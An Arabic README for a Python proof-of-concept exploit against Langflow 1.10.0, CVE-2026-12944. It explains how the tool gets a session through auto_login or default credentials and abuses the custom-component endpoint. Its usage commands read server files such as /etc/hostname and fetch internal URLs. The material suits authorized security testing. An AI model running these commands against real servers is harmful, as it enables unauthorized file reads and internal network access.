
Python PoC يستغل CVE-2026-12944، وهو SSRF في Langflow 1.10.0 عبر urllib في المكونات المخصصة، مع قدرات القراءة والجلب الموثقة.
Langflow OSS (≤ 1.10.0) — ثغرة تسمح بتنفيذ تعليمات برمجية عشوائية عبر urllib.request / socket في المكوّنات المخصّصة.
تجاوز ماسح المكوّنات قائمة الحظر الخاصة بهذه الوحدات من المكتبة القياسية. تم إصلاحها في 1.10.1 (IBM).
الخطورة: PR:L (قابلة لإعادة الإنتاج علنًا / خطورة منخفضة)
نقطة نهاية الاستغلال: POST /api/v1/custom_component
تتطلب ملف تعريف ارتباط للجلسة أو رمز bearer.
--test — لا يتطلب مصادقة. ينفّذ فقط GET /api/v1/version العام.--read / --fetch — المصادقة أولًا:
GET /api/v1/auto_login. إذا احتوى رد JSON على access_token، أرسل Authorization: Bearer … (دون الحاجة إلى اسم مستخدم/كلمة مرور).POST /api/v1/login باستخدام --uname / --password بصيغة application/x-www-form-urlencoded.POST /api/v1/custom_component.يُستخدم --uname / --password فقط إذا كان تسجيل الدخول التلقائي مُعطَّلًا. في التثبيت الافتراضي الأصلي يتم تجاهلهما.
لأغراض الاختبار المصرَّح به فقط. لا تستخدم هذا ضد أنظمة لا تملكها أو لا تملك إذنًا صريحًا باختبارها.
المتطلبات: Python 3 (المكتبة القياسية فقط).
python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --test
python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --read /etc/hostname
python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --fetch http://127.0.0.1:7860/api/v1/version
python3 cve-2026-12944-langflow-urllib-ssrf.py -u https://TARGET --read /etc/hostname --insecure
python3 cve-2026-12944-langflow-urllib-ssrf.py -u TARGET --uname langflow --password langflow --read /etc/hostname
التقرير وإثبات المفهوم: ShadowForge Cyber